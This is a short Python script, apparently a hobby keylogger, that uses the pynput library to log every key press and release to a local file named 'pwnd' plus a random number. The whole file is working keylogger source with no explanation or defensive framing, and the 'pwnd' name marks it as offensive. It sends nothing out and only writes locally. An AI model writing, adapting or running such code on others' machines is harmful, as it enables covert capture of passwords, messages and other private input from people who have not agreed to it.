#!/usr/bin/env python3
import random
from pynput.keyboard import Key, Listener, Controller

output = 'pwnd' + str(random.randint(99, 9999999999999999)) + '.txt'

with open(output, 'w') as f:
    f.close()


def on_press(key):
    with open(output, 'a') as f:
        f.write('{0} pressed\n'.format(key))
        f.close()


def on_release(key):
    with open(output, 'a') as f:
        f.write('{0} released\n'.format(key))
        f.close()


with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
    exit()
